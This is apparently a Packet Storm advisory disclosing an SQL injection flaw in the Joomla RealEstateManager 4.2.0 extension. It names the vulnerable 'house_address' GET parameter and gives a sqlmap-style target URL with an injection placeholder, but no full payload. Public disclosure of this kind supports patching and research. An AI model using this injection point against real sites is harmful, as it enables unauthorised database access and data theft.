Joomla RealEstateManager 4.2.0 SQL Injection

2018-01-03T00:00:00
ID PACKETSTORM:145627
Type packetstorm
Reporter Bilal Kardadou
Modified 2018-01-03T00:00:00

Description

                                        
                                            `################################################  
#Title: Joomla RealEstateManager 4.2.0 - SQL injection  
#Credit: Bilal KARDADOU  
#Vendor: http://ordasoft.com/  
#URL:  
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager/  
#Product: 'Joomla RealEstateManager 4.2.0'  
#Developer: OrdaSoft  
#Extension type: Plugin  
#Last updated: Dec 31 2017  
#Compatibility: 3.X  
#Google Dork: N/A  
################################################  
#  
# Description:  
# Real Estate Manager Basic is FREE version of real estate extension and  
property management software for real estate listing websites built on  
Joomla 3.x.  
# Real Estate Manager allows real estate agencies, real estate brokers and  
agents manage property listings,  
# property categories, hotel booking, motel booking, amenities, booking and  
buying requests and languages.  
# With our property extension you can upload photo, manage real estate  
categories and subcategories, display property on Google map, post comments  
and more.  
#  
# --Method=GET -p [house_address]  
#  
# -u "  
http://127.0.0.1/joomla/index.php/realestate/search-houses/search-by-map?house_address=a/'/[SQLI]&house_search_range=1000&house_search_latitude=48.3705449&house_search_longitude=10.897789999999986&house_cat=  
"  
#  
# PoC:  
# https://prnt.sc/hvidg3  
#  
#Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)  
################################################  
`